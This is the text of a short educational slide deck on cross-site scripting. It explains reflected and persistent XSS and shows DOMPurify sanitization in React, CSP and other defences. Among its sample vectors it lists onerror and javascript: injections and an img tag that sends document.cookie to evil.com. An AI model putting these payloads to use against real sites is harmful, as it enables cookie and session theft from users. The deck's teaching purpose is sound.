Espen Henriksen

Front-end team lead

Oslo Market Solutions

 

espen_dev

esphen

What is XSS and why should I care?

Lightning talk

What?

XSS

  • Cross Site Scripting
  • Sometimes called script injection
  • A way for malicious actors to inject code into your application
  • One of the top vulnerabilities of today
  • Is of a concern whenever you show user provided input like text

Two types

  • Reflected XSS
    • User input is reflected onto the website
    • For example a query parameter in the URL
    • http://example.com?msg=<script>...</script>
  • Persistent XSS
    • Same as above, but more dangerous
    • XSS is stored serverside and shown to all users

Why?

Effects

  • Steal cookies
  • Steal sessions
  • Deface sites
  • Insert advertising
  • Insert cryptocurrency miners
  • Blackmail users
  • Spread worms

Myspace worm

DEMO

Oh shit

Why is it so hard to stop?

  • Some of the many examples of XSS
  • <script>
  • <style>
  • <img src="javascript:..." />
  • <img src="invalid_link" onerror="..." />
  • <img src="http://evil.com?cookie={{$root.document.cookie}}" />
  • Don't roll your own sanitization!

Sanitization

// Sanitize is from DOMPurify
import { isMarkup, sanitize } from '@oms/utils';

// Adapted from Sniplet.js

export default ({ body }) => (
  // Check if the input is HTML
  !isMarkup(body)
    // If not, write body as text (safe in React)
    ? body
    // Otherwise, sanitize and write as HTML
    // Notice the dangerouslySetInnerHTML
    : <div dangerouslySetInnerHTML={sanitize(body)} />
);

Other mitigations

  • Scanning for vulnerabilities
  • Static analysis preventing dangerouslySetInnerHTML
  • Code reviews
  • x-xss-protection
  • CSP (Content Security Policy)

Fin

XSS and why I should care

By Eline H

XSS and why I should care

A lightning talk about XSS

  • 23